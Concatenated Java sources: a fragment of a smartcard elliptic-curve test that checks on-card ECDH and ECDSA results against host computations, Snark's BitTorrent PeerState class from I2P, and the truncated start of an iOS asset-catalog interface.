            CommandTest exportRemote = CommandTest.expect(new Command.Export(this.card, ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.KEY_PRIVATE, EC_Consts.PARAMETER_S), ExpectedValue.ANY);
            testVector.add(exportLocal);
            testVector.add(exportRemote);
            // Rebuild JCA key objects from the raw parameters exported by the card.
            // Returns null when the key material cannot be turned into JCA keys.
            BiFunction<Response.Export, Response.Export, Key[]> getKeys = (localData, remoteData) -> {
                byte[] pkey = localData.getParameter(ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.PARAMETER_W);
                byte[] skey = remoteData.getParameter(ECTesterApplet.KEYPAIR_REMOTE, EC_Consts.PARAMETER_S);
                ECParameterSpec spec = curve.toSpec();
                ECPrivateKeySpec privKeySpec = new ECPrivateKeySpec(new BigInteger(1, skey), spec);
                ECPublicKeySpec pubKeySpec = new ECPublicKeySpec(ECUtil.fromX962(pkey, curve.toCurve()), spec);
                PrivateKey privKey;
                PublicKey pubKey;
                try {
                    privKey = kf.generatePrivate(privKeySpec);
                    pubKey = kf.generatePublic(pubKeySpec);
                } catch (InvalidKeySpecException ex) {
                    return null;
                }
                return new Key[]{privKey, pubKey};
            };
            TestCallback<CommandTestable> kaCallback = new TestCallback<CommandTestable>() {
                @Override
                public Result apply(CommandTestable testable) {
                    Response.ECDH ecdhData = (Response.ECDH) testable.getResponse();
                    if (!ecdhData.successful())
                        return new Result(Value.FAILURE, "ECDH was unsuccessful.");
                    if (!ecdhData.hasSecret()) {
                        return new Result(Value.FAILURE, "ECDH response did not contain the derived secret.");
                    }
                    byte[] secret = ecdhData.getSecret();
                    Response.Export localData = (Response.Export) exportLocal.getResponse();
                    Response.Export remoteData = (Response.Export) exportRemote.getResponse();
                    Key[] keys = getKeys.apply(localData, remoteData);
                    if (keys == null) {
                        // Key reconstruction failed: the card result cannot be checked,
                        // but this is not treated as a card failure.
                        return new Result(Value.SUCCESS, "Result could not be verified. keyData unavailable.");
                    }
                    PrivateKey privKey = (PrivateKey) keys[0];
                    PublicKey pubKey = (PublicKey) keys[1];
                    try {
                        ka.init(privKey);
                        ka.doPhase(pubKey, true);
                        byte[] derived = ka.generateSecret();
                        // Left-pad the host-derived secret to the field size, since the
                        // provider may strip leading zero bytes.
                        int fieldSize = (curve.getBits() + 7) / 8;
                        if (derived.length < fieldSize) {
                            byte[] padded = new byte[fieldSize];
                            System.arraycopy(derived, 0, padded, fieldSize - derived.length, derived.length);
                            derived = padded;
                        }
                        // The DH/DHC JavaCard agreement variants hash the shared secret,
                        // so apply the same digest to the host-side value.
                        if (ecdhData.getType() == EC_Consts.KeyAgreement_ALG_EC_SVDP_DH || ecdhData.getType() == EC_Consts.KeyAgreement_ALG_EC_SVDP_DHC) {
                            derived = md.digest(derived);
                        }
                        if (secret.length != derived.length) {
                            if (secret.length < derived.length) {
                                return new Result(Value.FAILURE, String.format("Derived secret was shorter than expected: %d vs %d (expected).", secret.length, derived.length));
                            } else {
                                return new Result(Value.FAILURE, String.format("Derived secret was longer than expected: %d vs %d (expected).", secret.length, derived.length));
                            }
                        }
                        int diff = ByteUtil.diffBytes(derived, 0, secret, 0, secret.length);
                        if (diff == secret.length) {
                            return new Result(Value.SUCCESS, "Derived secret matched expected value.");
                        } else {
                            return new Result(Value.FAILURE, "Derived secret does not match expected value, first difference was at byte " + diff + ".");
                        }
                    } catch (InvalidKeyException ex) {
                        return new Result(Value.SUCCESS, "Result could not be verified. " + ex.getMessage());
                    }
                }
            };
            Test ecdhTest = CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, EC_Consts.KeyAgreement_ALG_EC_SVDP_DH), kaCallback);
            Test ecdhRawTest = CommandTest.function(new Command.ECDH(this.card, ECTesterApplet.KEYPAIR_LOCAL, ECTesterApplet.KEYPAIR_REMOTE, ECTesterApplet.EXPORT_TRUE, EC_Consts.TRANSFORMATION_NONE, EC_Consts.KeyAgreement_ALG_EC_SVDP_DH_PLAIN), kaCallback);
            // Sign a 32-byte all-zero message on-card, then verify the signature host-side.
            byte[] data = new byte[32];
            TestCallback<CommandTestable> sigCallback = new TestCallback<CommandTestable>() {
                @Override
                public Result apply(CommandTestable testable) {
                    Response.ECDSA ecdsaData = (Response.ECDSA) testable.getResponse();
                    if (!ecdsaData.successful())
                        return new Result(Value.FAILURE, "ECDSA was unsuccessful.");
                    if (!ecdsaData.hasSignature()) {
                        return new Result(Value.FAILURE, "ECDSA response did not contain the signature.");
                    }
                    byte[] signature = ecdsaData.getSignature();
                    Response.Export localData = (Response.Export) exportLocal.getResponse();
                    Response.Export remoteData = (Response.Export) exportRemote.getResponse();
                    Key[] keys = getKeys.apply(localData, remoteData);
                    if (keys == null) {
                        return new Result(Value.SUCCESS, "Result could not be verified. keyData unavailable.");
                    }
                    PublicKey pubKey = (PublicKey) keys[1];
                    try {
                        sig.initVerify(pubKey);
                        sig.update(data);
                        if (sig.verify(signature)) {
                            return new Result(Value.SUCCESS, "Signature verified.");
                        } else {
                            return new Result(Value.FAILURE, "Signature failed to verify.");
                        }
                    } catch (InvalidKeyException | SignatureException ex) {
                        return new Result(Value.SUCCESS, "Result could not be verified. " + ex.getMessage());
                    }
                }
            };
            Test ecdsaTest = CommandTest.function(new Command.ECDSA_sign(this.card, ECTesterApplet.KEYPAIR_LOCAL, EC_Consts.Signature_ALG_ECDSA_SHA, ECTesterApplet.EXPORT_TRUE, data), sigCallback);
            testVector.add(CompoundTest.all(ExpectedValue.SUCCESS, "Test.", ecdhTest, ecdhRawTest, ecdsaTest));
            if (cfg.cleanup) {
                testVector.add(CommandTest.expect(new Command.Cleanup(this.card), ExpectedValue.ANY));
            }
            doTest(CompoundTest.greedyAll(ExpectedValue.SUCCESS, "Validation test on " + curve.getId() + ".", testVector.toArray(new Test[0])));
        }
    }
}
/* PeerState - Keeps track of the Peer state through connection callbacks. Copyright (C) 2003 Mark J. Wielaard This file is part of Snark. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA. */ package org.klomp.snark; import java.util.ArrayList; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Set; import net.i2p.I2PAppContext; import net.i2p.data.ByteArray; import net.i2p.util.Log; class PeerState implements DataLoader { private final Log _log = I2PAppContext.getGlobalContext().logManager().getLog(PeerState.class); private final Peer peer; /** Fixme, used by Peer.disconnect() to get to the coordinator */ final PeerListener listener; private MetaInfo metainfo; // Interesting and choking describes whether we are interested in or // are choking the other side. volatile boolean interesting; volatile boolean choking = true; // Interested and choked describes whether the other side is // interested in us or choked us. volatile boolean interested; volatile boolean choked = true; /** the pieces the peer has */ BitField bitfield; // Package local for use by Peer. 
final PeerConnectionIn in; final PeerConnectionOut out; // Outstanding request private final List<Request> outstandingRequests = new ArrayList<Request>(); /** the tail (NOT the head) of the request queue */ private Request lastRequest = null; // FIXME if piece size < PARTSIZE, pipeline could be bigger private final static int MAX_PIPELINE = 5; // this is for outbound requests private final static int MAX_PIPELINE_BYTES = 128*1024; // this is for inbound requests public final static int PARTSIZE = 16*1024; // outbound request private final static int MAX_PARTSIZE = 64*1024; // Don't let anybody request more than this /** * @param metainfo null if in magnet mode */ PeerState(Peer peer, PeerListener listener, MetaInfo metainfo, PeerConnectionIn in, PeerConnectionOut out) { this.peer = peer; this.listener = listener; this.metainfo = metainfo; this.in = in; this.out = out; } // NOTE Methods that inspect or change the state synchronize (on this). void keepAliveMessage() { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv alive"); /* XXX - ignored */ } void chokeMessage(boolean choke) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv " + (choke ? "" : "un") + "choked"); boolean resend = choked && !choke; choked = choke; listener.gotChoke(peer, choke); if (interesting && !choked) request(resend); if (choked) { out.cancelRequestMessages(); // old Roberts thrash us here, choke+unchoke right together // The only problem with returning the partials to the coordinator // is that chunks above a missing request are lost. // Future enhancements to PartialPiece could keep track of the holes. List<Request> pcs = returnPartialPieces(); if (!pcs.isEmpty()) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " got choked, returning partial pieces to the PeerCoordinator: " + pcs); listener.savePartialPieces(this.peer, pcs); } } } void interestedMessage(boolean interest) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv " + (interest ? 
"" : "un") + "interested"); interested = interest; listener.gotInterest(peer, interest); } void haveMessage(int piece) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv have(" + piece + ")"); // FIXME we will lose these until we get the metainfo if (metainfo == null) return; // Sanity check if (piece < 0 || piece >= metainfo.getPieces()) { // XXX disconnect? if (_log.shouldLog(Log.WARN)) _log.warn("Got strange 'have: " + piece + "' message from " + peer); return; } synchronized(this) { // Can happen if the other side never send a bitfield message. if (bitfield == null) bitfield = new BitField(metainfo.getPieces()); bitfield.set(piece); } if (listener.gotHave(peer, piece)) setInteresting(true); } void bitfieldMessage(byte[] bitmap) { synchronized(this) { if (_log.shouldLog(Log.DEBUG)) _log.debug(peer + " rcv bitfield"); if (bitfield != null) { // XXX - Be liberal in what you except? if (_log.shouldLog(Log.WARN)) _log.warn("Got unexpected bitfield message from " + peer); return; } // XXX - Check for weird bitfield and disconnect? // FIXME will have to regenerate the bitfield after we know exactly // how many pieces there are, as we don't know how many spare bits there are. if (metainfo == null) bitfield = new BitField(bitmap, bitmap.length * 8); else bitfield = new BitField(bitmap, metainfo.getPieces()); } if (metainfo == null) return; boolean interest = listener.gotBitField(peer, bitfield); setInteresting(interest); if (bitfield.complete() && !interest) { // They are seeding and we are seeding, // why did they contact us? 
      (robert) // Dump them quick before we send our whole bitmap
      if (_log.shouldLog(Log.WARN))
          _log.warn("Disconnecting seed that connects to seeds: " + peer);
      peer.disconnect(true);
    }
  }

  /**
   * The remote peer asked us for a chunk. Validates the request and,
   * if acceptable, queues the upload on the outgoing connection
   * (the actual bytes are loaded lazily via loadData()).
   */
  void requestMessage(int piece, int begin, int length)
  {
      if (_log.shouldLog(Log.DEBUG))
          _log.debug(peer + " rcv request("
                     + piece + ", " + begin + ", " + length + ") ");
      // no metainfo yet (still in magnet mode) - nothing to serve
      if (metainfo == null)
          return;
      if (choking) {
          if (_log.shouldLog(Log.INFO))
              _log.info("Request received, but choking " + peer);
          return;
      }

      // Sanity check
      if (piece < 0
          || piece >= metainfo.getPieces()
          || begin < 0
          || begin > metainfo.getPieceLength(piece)
          || length <= 0
          || length > MAX_PARTSIZE) {
          // XXX - Protocol error -> disconnect?
          if (_log.shouldLog(Log.WARN))
              _log.warn("Got strange 'request: " + piece
                        + ", " + begin
                        + ", " + length
                        + "' message from " + peer);
          return;
      }

      // Limit total pipelined requests to MAX_PIPELINE bytes
      // to conserve memory and prevent DOS
      // Todo: limit number of requests also? (robert 64 x 4KB)
      if (out.queuedBytes() + length > MAX_PIPELINE_BYTES) {
          if (_log.shouldLog(Log.WARN))
              _log.warn("Discarding request over pipeline limit from " + peer);
          return;
      }

      if (_log.shouldLog(Log.DEBUG))
          _log.debug("Queueing (" + piece + ", " + begin + ", " + length + ")" +
                     " to " + peer);

      // don't load the data into mem now, let PeerConnectionOut do it
      out.sendPiece(piece, begin, length, this);
  }

  /**
   * This is the callback that PeerConnectionOut calls
   *
   * @return bytes or null for errors
   * @since 0.8.2
   */
  public ByteArray loadData(int piece, int begin, int length) {
      ByteArray pieceBytes = listener.gotRequest(peer, piece, begin, length);
      if (pieceBytes == null) {
          // XXX - Protocol error-> diconnect?
          if (_log.shouldLog(Log.WARN))
              _log.warn("Got request for unknown piece: " + piece);
          return null;
      }

      // More sanity checks
      if (length != pieceBytes.getData().length) {
          // XXX - Protocol error-> disconnect?
          if (_log.shouldLog(Log.WARN))
              _log.warn("Got out of range 'request: " + piece
                        + ", " + begin
                        + ", " + length
                        + "' message from " + peer);
          return null;
      }

      if (_log.shouldLog(Log.DEBUG))
          _log.debug("Sending (" + piece + ", " + begin + ", " + length + ")" +
                     " to " + peer);
      return pieceBytes;
  }

  /**
   * Called when some bytes have left the outgoing connection.
   * XXX - Should indicate whether it was a real piece or overhead.
   */
  void uploaded(int size)
  {
      peer.uploaded(size);
      listener.uploaded(peer, size);
  }

  // This is used to flag that we have to back up from the firstOutstandingRequest
  // when calculating how far we've gotten
  private Request pendingRequest;

  /**
   * Called when a full chunk (i.e. a piece message) has been received by
   * PeerConnectionIn.
   *
   * This may block quite a while if it is the last chunk for a piece,
   * as it calls the listener, who stores the piece and then calls
   * havePiece for every peer on the torrent (including us).
   *
   */
  void pieceMessage(Request req)
  {
      int size = req.len;
      peer.downloaded(size);
      listener.downloaded(peer, size);

      if (_log.shouldLog(Log.DEBUG))
          _log.debug("got end of Chunk("
                     + req.getPiece() + "," + req.off + "," + req.len + ") from "
                     + peer);

      // Last chunk needed for this piece?
      // FIXME if priority changed to skip, we will think we're done when we aren't
      if (getFirstOutstandingRequest(req.getPiece()) == -1) {
          // warning - may block here for a while
          if (listener.gotPiece(peer, req.getPartialPiece())) {
              if (_log.shouldLog(Log.DEBUG))
                  _log.debug("Got " + req.getPiece() + ": " + peer);
          } else {
              if (_log.shouldLog(Log.WARN))
                  _log.warn("Got BAD " + req.getPiece() + " from " + peer);
          }
      }

      // ok done with this one
      synchronized(this) {
          pendingRequest = null;
      }
  }

  /**
   * @return index in outstandingRequests or -1
   */
  synchronized private int getFirstOutstandingRequest(int piece)
  {
      for (int i = 0; i < outstandingRequests.size(); i++)
          if (outstandingRequests.get(i).getPiece() == piece)
              return i;
      return -1;
  }

  /**
   * Called when a piece message is being processed by the incoming
   * connection. That is, when the header of the piece message was received.
   * Returns null when there was no such request. It also
   * requeues/sends requests when it thinks that they must have been
   * lost.
   */
  Request getOutstandingRequest(int piece, int begin, int length)
  {
      if (_log.shouldLog(Log.DEBUG))
          _log.debug("got start of Chunk("
                     + piece + "," + begin + "," + length + ") from "
                     + peer);

      // Lookup the correct piece chunk request from the list.
      Request req;
      synchronized(this) {
          int r = getFirstOutstandingRequest(piece);

          // Unrequested piece number?
          if (r == -1) {
              if (_log.shouldLog(Log.INFO))
                  _log.info("Unrequested 'piece: " + piece + ", "
                            + begin + ", " + length + "' received from " + peer);
              return null;
          }

          // scan forward to the queued request matching this offset
          req = outstandingRequests.get(r);
          while (req.getPiece() == piece && req.off != begin
                 && r < outstandingRequests.size() - 1) {
              r++;
              req = outstandingRequests.get(r);
          }

          // Something wrong?
          if (req.getPiece() != piece || req.off != begin || req.len != length) {
              if (_log.shouldLog(Log.INFO))
                  _log.info("Unrequested or unneeded 'piece: "
                            + piece + ", "
                            + begin + ", "
                            + length + "' received from " + peer);
              return null;
          }

          // note that this request is being read
          pendingRequest = req;

          // Report missing requests.
          if (r != 0) {
              if (_log.shouldLog(Log.WARN))
                  _log.warn("Some requests dropped, got " + req
                            + ", wanted for peer: " + peer);
              // requeue the skipped-over requests at the tail and resend them
              for (int i = 0; i < r; i++) {
                  Request dropReq = outstandingRequests.remove(0);
                  outstandingRequests.add(dropReq);
                  if (!choked)
                      out.sendRequest(dropReq);
                  if (_log.shouldLog(Log.WARN))
                      _log.warn("dropped " + dropReq + " with peer " + peer);
              }
          }
          outstandingRequests.remove(0);
      }

      // Request more if necessary to keep the pipeline filled.
      addRequest();

      return req;
  }

  /**
   * @return lowest offset of any request for the piece
   * @since 0.8.2
   */
  synchronized private Request getLowestOutstandingRequest(int piece) {
      Request rv = null;
      int lowest = Integer.MAX_VALUE;
      for (Request r : outstandingRequests) {
          if (r.getPiece() == piece && r.off < lowest) {
              lowest = r.off;
              rv = r;
          }
      }
      // the request currently being read may be lower still
      if (pendingRequest != null &&
          pendingRequest.getPiece() == piece && pendingRequest.off < lowest)
          rv = pendingRequest;

      if (_log.shouldLog(Log.DEBUG))
          _log.debug(peer + " lowest for " + piece + " is " + rv + " out of "
                     + pendingRequest + " and " + outstandingRequests);
      return rv;
  }

  /**
   * Get partial pieces, give them back to PeerCoordinator.
   * Clears the request queue.
* @return List of PartialPieces, even those with an offset == 0, or empty list * @since 0.8.2 */ synchronized List<Request> returnPartialPieces() { Set<Integer> pcs = getRequestedPieces(); List<Request> rv = new ArrayList<Request>(pcs.size()); for (Integer p : pcs) { Request req = getLowestOutstandingRequest(p.intValue()); if (req != null) { req.getPartialPiece().setDownloaded(req.off); rv.add(req); } } outstandingRequests.clear(); pendingRequest = null; lastRequest = null; return rv; } /** * @return all pieces we are currently requesting, or empty Set */ synchronized private Set<Integer> getRequestedPieces() { Set<Integer> rv = new HashSet<Integer>(outstandingRequests.size() + 1); for (Request req : outstandingRequests) { rv.add(Integer.valueOf(req.getPiece())); if (pendingRequest != null) rv.add(Integer.valueOf(pendingRequest.getPiece())); } return rv; } void cancelMessage(int piece, int begin, int length) { if (_log.shouldLog(Log.DEBUG)) _log.debug("Got cancel message (" + piece + ", " + begin + ", " + length + ")"); out.cancelRequest(piece, begin, length); } /** @since 0.8.2 */ void extensionMessage(int id, byte[] bs) { if (metainfo != null && metainfo.isPrivate() && (id == ExtensionHandler.ID_METADATA || id == ExtensionHandler.ID_PEX)) { // shouldn't get this since we didn't advertise it but they could send it anyway if (_log.shouldLog(Log.WARN)) _log.warn("Private torrent, ignoring ext msg " + id); return; } ExtensionHandler.handleMessage(peer, listener, id, bs); // Peer coord will get metadata from MagnetState, // verify, and then call gotMetaInfo() listener.gotExtension(peer, id, bs); } /** * Switch from magnet mode to normal mode. * If we already have the metainfo, this does nothing. 
   * @param meta non-null
   * @since 0.8.4
   */
  public void setMetaInfo(MetaInfo meta) {
      // already have it - nothing to do
      if (metainfo != null)
          return;
      BitField oldBF = bitfield;
      if (oldBF != null) {
          if (oldBF.size() != meta.getPieces())
              // fix bitfield, it was too big by 1-7 bits
              bitfield = new BitField(oldBF.getFieldBytes(), meta.getPieces());
          // else no extra
      } else {
          // it will be initialized later
          //bitfield = new BitField(meta.getPieces());
      }
      metainfo = meta;
      if (bitfield != null && bitfield.count() > 0)
          setInteresting(true);
  }

  /**
   * Unused
   * @since 0.8.4
   */
  void portMessage(int port)
  {
      // for compatibility with old DHT PORT message
      listener.gotPort(peer, port, port + 1);
  }

  void unknownMessage(int type, byte[] bs)
  {
      if (_log.shouldLog(Log.WARN))
          _log.warn("Warning: Ignoring unknown message type: " + type
                    + " length: " + bs.length);
  }

  /**
   * We now have this piece.
   * Tell the peer and cancel any requests for the piece.
   */
  void havePiece(int piece)
  {
      if (_log.shouldLog(Log.DEBUG))
          _log.debug("Tell " + peer + " havePiece(" + piece + ")");

      // Tell the other side that we are no longer interested in any of
      // the outstanding requests for this piece.
      cancelPiece(piece);

      // Tell the other side that we really have this piece.
      out.sendHave(piece);

      // Request something else if necessary.
      addRequest();

      /**** taken care of in addRequest()
      synchronized(this) {
          // Is the peer still interesting?
          if (lastRequest == null)
              setInteresting(false);
      }
      ****/
  }

  /**
   * Tell the other side that we are no longer interested in any of
   * the outstanding requests (if any) for this piece.
   * @since 0.8.1
   */
  synchronized void cancelPiece(int piece) {
      if (lastRequest != null && lastRequest.getPiece() == piece)
          lastRequest = null;

      Iterator<Request> it = outstandingRequests.iterator();
      while (it.hasNext()) {
          Request req = it.next();
          if (req.getPiece() == piece) {
              it.remove();
              // Send cancel even when we are choked to make sure that it is
              // really never ever send.
              out.sendCancel(req);
              req.getPartialPiece().release();
          }
      }
  }

  /**
   * Are we currently requesting the piece?
   * @deprecated deadlocks
   * @since 0.8.1
   */
  synchronized boolean isRequesting(int piece) {
      if (pendingRequest != null && pendingRequest.getPiece() == piece)
          return true;
      for (Request req : outstandingRequests) {
          if (req.getPiece() == piece)
              return true;
      }
      return false;
  }

  /**
   * Starts or resumes requesting pieces.
   * @param resend should we resend outstanding requests?
   */
  private void request(boolean resend)
  {
      // Are there outstanding requests that have to be resend?
      if (resend) {
          synchronized (this) {
              if (!outstandingRequests.isEmpty()) {
                  out.sendRequests(outstandingRequests);
                  if (_log.shouldLog(Log.DEBUG))
                      _log.debug("Resending requests to " + peer + outstandingRequests);
              }
          }
      }

      // Add/Send some more requests if necessary.
      addRequest();
  }

  /**
   * Adds a new request to the outstanding requests list.
   * Then send interested if we weren't.
   * Then send new requests if not choked.
   * If nothing to request, send not interested if we were.
   *
   * This is called from several places:
   *<pre>
   * By getOustandingRequest() when the first part of a chunk comes in
   * By havePiece() when somebody got a new piece completed
   * By chokeMessage() when we receive an unchoke
   * By setInteresting() when we are now interested
   * By PeerCoordinator.updatePiecePriorities()
   *</pre>
   */
  synchronized void addRequest()
  {
      // no bitfield yet? nothing to request then.
      if (bitfield == null)
          return;
      if (metainfo == null)
          return;
      boolean more_pieces = true;
      while (more_pieces) {
          // keep the pipeline filled up to MAX_PIPELINE requests
          more_pieces = outstandingRequests.size() < MAX_PIPELINE;

          // We want something and we don't have outstanding requests?
          if (more_pieces && lastRequest == null) {
              // we have nothing in the queue right now
              if (!interesting) {
                  // If we need something, set interesting but delay pulling
                  // a request from the PeerCoordinator until unchoked.
                  if (listener.needPiece(this.peer, bitfield)) {
                      setInteresting(true);
                      if (_log.shouldLog(Log.DEBUG))
                          _log.debug(peer + " addRequest() we need something, setting interesting, delaying requestNextPiece()");
                  } else {
                      if (_log.shouldLog(Log.DEBUG))
                          _log.debug(peer + " addRequest() needs nothing");
                  }
                  return;
              }
              if (choked) {
                  // If choked, delay pulling
                  // a request from the PeerCoordinator until unchoked.
                  if (_log.shouldLog(Log.DEBUG))
                      _log.debug(peer + " addRequest() we are choked, delaying requestNextPiece()");
                  return;
              }
              // huh? rv unused
              more_pieces = requestNextPiece();
          } else if (more_pieces) // We want something
          {
              int pieceLength;
              boolean isLastChunk;
              pieceLength = metainfo.getPieceLength(lastRequest.getPiece());
              isLastChunk = lastRequest.off + lastRequest.len == pieceLength;

              // Last part of a piece?
              if (isLastChunk)
                  more_pieces = requestNextPiece();
              else {
                  // queue the next chunk of the same piece
                  PartialPiece nextPiece = lastRequest.getPartialPiece();
                  int nextBegin = lastRequest.off + PARTSIZE;
                  int maxLength = pieceLength - nextBegin;
                  int nextLength = maxLength > PARTSIZE ? PARTSIZE : maxLength;
                  Request req = new Request(nextPiece, nextBegin, nextLength);
                  outstandingRequests.add(req);
                  if (!choked)
                      out.sendRequest(req);
                  lastRequest = req;
              }
          }
      }

      // failsafe
      // However this is bad as it thrashes the peer when we change our mind
      // Ticket 691 cause here?
      if (interesting && lastRequest == null && outstandingRequests.isEmpty())
          setInteresting(false);

      if (_log.shouldLog(Log.DEBUG))
          _log.debug(peer + " requests " + outstandingRequests);
  }

  /**
   * Starts requesting first chunk of next piece. Returns true if
   * something has been added to the requests, false otherwise.
   * Caller should synchronize.
   */
  private boolean requestNextPiece()
  {
      // Check that we already know what the other side has.
      if (bitfield != null) {
          // Check for adopting an orphaned partial piece
          PartialPiece pp = listener.getPartialPiece(peer, bitfield);
          if (pp != null) {
              // Double-check that r not already in outstandingRequests
              if (!getRequestedPieces().contains(Integer.valueOf(pp.getPiece()))) {
                  Request r = pp.getRequest();
                  outstandingRequests.add(r);
                  if (!choked)
                      out.sendRequest(r);
                  lastRequest = r;
                  return true;
              } else {
                  if (_log.shouldLog(Log.WARN))
                      _log.warn("Got dup from coord: " + pp);
                  pp.release();
              }
          }

          /******* getPartialPiece() does it all now
          // Note that in addition to the bitfield, PeerCoordinator uses
          // its request tracking and isRequesting() to determine
          // what piece to give us next.
          int nextPiece = listener.wantPiece(peer, bitfield);
          if (nextPiece != -1
              && (lastRequest == null || lastRequest.getPiece() != nextPiece)) {
              if (_log.shouldLog(Log.DEBUG))
                  _log.debug(peer + " want piece " + nextPiece);
              // Fail safe to make sure we are interested
              // When we transition into the end game we may not be interested...
              if (!interesting) {
                  if (_log.shouldLog(Log.DEBUG))
                      _log.debug(peer + " transition to end game, setting interesting");
                  interesting = true;
                  out.sendInterest(true);
              }

              int piece_length = metainfo.getPieceLength(nextPiece);
              //Catch a common place for OOMs esp. on 1MB pieces
              byte[] bs;
              try {
                  bs = new byte[piece_length];
              } catch (OutOfMemoryError oom) {
                  _log.warn("Out of memory, can't request piece " + nextPiece, oom);
                  return false;
              }
              int length = Math.min(piece_length, PARTSIZE);
              Request req = new Request(nextPiece, bs, 0, length);
              outstandingRequests.add(req);
              if (!choked)
                  out.sendRequest(req);
              lastRequest = req;
              return true;
          } else {
              if (_log.shouldLog(Log.DEBUG))
                  _log.debug(peer + " no more pieces to request");
          }
          *******/
      }

      // failsafe
      // However this is bad as it thrashes the peer when we change our mind
      // Ticket 691 cause here?
      if (outstandingRequests.isEmpty())
          lastRequest = null;

      // If we are not in the end game, we may run out of things to request
      // because we are asking other peers. Set not-interesting now rather than
      // wait for those other requests to be satisfied via havePiece()
      if (interesting && lastRequest == null) {
          interesting = false;
          out.sendInterest(false);
          if (_log.shouldLog(Log.DEBUG))
              _log.debug(peer + " nothing more to request, now uninteresting");
      }
      return false;
  }

  synchronized void setInteresting(boolean interest)
  {
      if (interest != interesting) {
          if (_log.shouldLog(Log.DEBUG))
              _log.debug(peer + " setInteresting(" + interest + ")");
          interesting = interest;
          out.sendInterest(interest);

          if (interesting && !choked)
              request(true); // we shouldnt have any pending requests, but if we do, resend them
      }
  }

  synchronized void setChoking(boolean choke)
  {
      if (choking != choke) {
          if (_log.shouldLog(Log.DEBUG))
              _log.debug(peer + " setChoking(" + choke + ")");
          choking = choke;
          out.sendChoke(choke);
      }
  }

  void keepAlive()
  {
      out.sendAlive();
  }

  synchronized void retransmitRequests()
  {
      if (interesting && !choked)
          out.retransmitRequests(outstandingRequests);
  }

  /**
   * debug
   * @return string or null
   * @since 0.8.1
   */
  synchronized String getRequests() {
      if (outstandingRequests.isEmpty())
          return null;
      else
          return outstandingRequests.toString();
  }
}
/**
 * Copyright (c) 2013 gootara.org <http://gootara.org>
 *
 * The MIT License (MIT)
 *
 * Permission is hereby granted, free of charge, to any person obtaining a copy of
 * this software and associated documentation files (the "Software"), to deal in
 * the Software without restriction, including without limitation the rights to
 * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
 * the Software, and to permit persons to whom the Software is furnished to do so,
 * subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in all
 * copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
 * FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
 * COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
 * IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
 * CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
 */
package org.gootara.ios.image.util;

import java.io.BufferedWriter;
import java.io.File;
import java.io.FileOutputStream;
import java.io.FileWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.util.ArrayList;
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;

/**
 * The asset catalogs for iOS.
* * @author gootara.org */ public interface IOSAssetCatalogs { public enum JSON_KEY { IDIOM ("idiom") , FILENAME ("filename") , SUBTYPE ("subtype") , ROLE ("role") , SCALE ("scale") , SIZE ("size") , ORIENTATION ("orientation") , EXTENT ("extent") , SCREEN_WIDTH ("screenWidth") , WIDTH_CLASS ("widthClass") , HEIGHT_CLASS ("heightClass") , MINIMUM_SYSTEM_VERSION ("minimum-system-version") ; private String keyName; JSON_KEY(String keyName) { this.keyName = keyName; } @Override public String toString() { return this.keyName; } } public enum SYSTEM_VERSION { ANY (0.0f) , IOS7 (7.0f) , IOS8 (8.0f) , IOS9 (9.0f) , IOS10 (10.0f) , IOS11 (11.0f) ; private float value; SYSTEM_VERSION(float value) { this.value = value; } @Override public String toString() { return String.format("%.1f", value); } public float value() { return value; } public boolean later(SYSTEM_VERSION that) { return that.value < this.value; } public boolean andLater(SYSTEM_VERSION that) { return that.value <= this.value; } public boolean prior(SYSTEM_VERSION that) { return that.value > this.value; } public boolean andPrior(SYSTEM_VERSION that) { return that.value >= this.value; } } public enum IDIOM { UNIVERSAL ("universal") , IPHONE ("iphone") , IPAD ("ipad") , CARPLAY ("car") , APPLEWATCH ("watch") , MAC ("mac") , TV ("tv") , IOS_MARKETING ("ios-marketing") , WATCH_MARKETING ("watch-marketing") ; private String idiom; IDIOM(String idiom) { this.idiom = idiom; } @Override public String toString() { return this.idiom; } public boolean isUniversal() { return this.idiom.equals(UNIVERSAL.toString()); } public boolean isIphone() { return this.idiom.equals(IPHONE.toString()); } public boolean isIpad() { return this.idiom.equals(IPAD.toString()); } public boolean isAppleWatch() { return this.idiom.equals(APPLEWATCH.toString()); } public boolean isCarplay() { return this.idiom.equals(CARPLAY.toString()); } public boolean isMac() { return this.idiom.equals(MAC.toString()); } public boolean isTv() { return 
